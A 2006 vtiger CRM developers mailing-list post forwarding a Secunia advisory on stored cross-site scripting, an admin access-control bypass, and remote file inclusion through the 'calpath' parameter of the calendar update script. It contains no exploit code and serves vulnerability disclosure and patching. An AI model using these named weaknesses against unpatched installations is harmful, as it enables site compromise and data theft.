[Vtigercrm-developers] Fwd: [SA21728] vtiger CRM Multiple Vulnerabilities
Kim Haverblad
kim at haverblad.se
Thu Oct 12 01:07:01 PDT 2006
Mike,
I see that you have access to the commercial version of Secunia service
and that good since the change log updates that you got is only sent out
to customers and not to the open list that I'm on.
The change log says following then according to your post:
2006-10-11: Updated "Title", "Description", and "Solution" section.
Added additional vulnerability provided by Dedi Dwianto. Updated
"Criticality".
Since criticality has been updated I really hope that we see an update
soon - if not this can only be negative for the vtiger project.
/Kim
Mike O'Loan wrote:
> There's a new highly critical advisory from Secunia about script
> insertion, etc. This seems to be an upgrade of the one posted on Sep 4.
>
> Mike O'Loan
>
> ---------- Forwarded message ----------
> From: *Secunia* < advisories at secunia.com <mailto:advisories at secunia.com>>
> Date: Oct 12, 2006 2:21 AM
> Subject: [SA21728] vtiger CRM Multiple Vulnerabilities
> To: secunia at saucesoft.com <mailto:secunia at saucesoft.com>
>
>
> TITLE:
> vtiger CRM Multiple Vulnerabilities
>
> SECUNIA ADVISORY ID:
> SA21728
>
> VERIFY ADVISORY:
> https://ca.secunia.com/?page=viewadvisory&vuln_id=21728
> <https://ca.secunia.com/?page=viewadvisory&vuln_id=21728>
>
> CRITICAL:
> Highly critical
>
> IMPACT:
> Security Bypass, Cross Site Scripting, System access
>
> WHERE:
> From remote
>
> REVISION:
> 2.0 originally posted 2006-09-04
>
> SOFTWARE:
> vtiger CRM 4.x
> http://secunia.com/product/6211/
>
> DESCRIPTION:
> Some vulnerabilities have been discovered in vtiger CRM, which can be
> exploited by malicious people to conduct script insertion attacks,
> bypass certain security restrictions, and to compromise a vulnerable
> system.
>
> 1) Input passed to the "description" field in various modules when
> e.g. creating a contact and the "solution" field when an
> administrator modifies the solution in the HelpDesk modules isn't
> properly sanitised before being used. This can be exploited to inject
> arbitrary HTML and script code, which will be executed in a user's
> browser session in context of an affected site when the malicious
> user data is viewed.
>
> 2) An error in the access control verification can be exploited by a
> normal user to access administrative modules (e.g. the settings
> section) by accessing certain URLs directly.
>
> 3) Input passed to the "calpath" parameter in
> modules/Calendar/admin/update.php is not properly verified before
> being used to include files. This can be exploited to execute
> arbitrary PHP code by including files from local or external
> resources.
>
> The vulnerabilities have been confirmed in version 4.2.4. Other
> versions may also be affected.
>
> SOLUTION:
> Edit the source code to ensure that input is properly sanitised and
> verified, and that access to administrative modules are properly
> checked.
>
> Use another product.
>
> PROVIDED AND/OR DISCOVERED BY:
> 1,2) Ivan Markovic
> 3) Dedi Dwianto
>
> CHANGELOG:
> 2006-09-07: Added CVE references.
> 2006-09-18: Added CVE reference.
> 2006-10-11: Updated "Title", "Description", and "Solution" section.
> Added additional vulnerability provided by Dedi Dwianto. Updated
> "Criticality".
>
> ORIGINAL ADVISORY:
> 1,2) http://www.security-net.biz/adv/D3906a.txt
> <http://www.security-net.biz/adv/D3906a.txt>
>
> 3) http://advisories.echo.or.id/adv/adv54-theday-2006.txt
>
> ----------------------------------------------------------------------
>
> Secunia recommends that you verify all advisories you receive by
> clicking the link.
> Secunia NEVER sends attached files with advisories.
> Secunia does not advise people to install third party patches, only
> use those supplied by the vendor.
>
> Definitions: (Criticality, Where etc.)
> http://secunia.com/about_secunia_advisories/
> <http://secunia.com/about_secunia_advisories/>
>
> <mailto:mike.oloan at saucesoft.com>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Reach hundreds of potential candidates - http://jobs.vtiger.com
More information about the vtigercrm-developers
mailing list